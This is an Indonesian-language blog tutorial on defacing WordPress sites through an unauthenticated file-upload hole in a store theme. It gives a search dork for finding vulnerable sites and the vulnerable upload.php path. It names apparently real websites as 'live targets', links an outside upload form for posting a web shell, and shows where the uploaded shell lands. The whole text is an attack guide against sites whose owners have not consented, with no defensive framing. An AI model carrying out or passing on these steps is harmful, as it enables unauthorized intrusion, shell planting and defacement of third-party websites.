Tutorial Deface With Exploit Wordpress Store Shell Upload
Hai gan ketemu lagi dengan saya kumpul berbagi, yang sudah lama tidak update wkwkwkwk tapi kali ini saya akan update setiap hari karena ada sesuatu yang ada di blog ini jadi kali ini mau share Cara Deface Dengan Exploit Wordpress Store Shell Upload , ok langsung saja ke tutorialnya ...
Pertama pertama dorking dulu dengan dork
inurl:uploads/products_img/
setelah dorking kita CTRL+U di websitenya untkuk cek themes yang dipake,
untuk exploitnya
/upload/upload.php
jadi kaya gini nih gan
http://www.demain-ingenieur.fr/wp-content/themes/demainingenieur/upload/upload.php
Kalo vuln blank
live target
www.deybras.com/
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
kita copy alamatnya /url
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
setelah copy kita masuk ke csrf online bisa kamu pakai kalian kunjungi dissini
http://sgmarketing.com.pl/nitip.php
ok langsung saja ke exploinya kita copy urlnya
isikan target dengan url yang tadi
postname ini myfile
setelah itu upload shell
suksess blank
letak shell di
http://target.com/wp-content/uploads/products_img/namashell.php
shell udah ke upload sekian tutorial dari saya
jangan lupa Share Cara Deface Dengan Exploit Wordpress Store Shell Upload ,
Thanks to all member defacer indonesia :*
Jika kurang jelas bisa tonton videonya disin. atau disini https://www.youtube.com/watch?v=xBeVii3zXPg
EmoticonEmoticon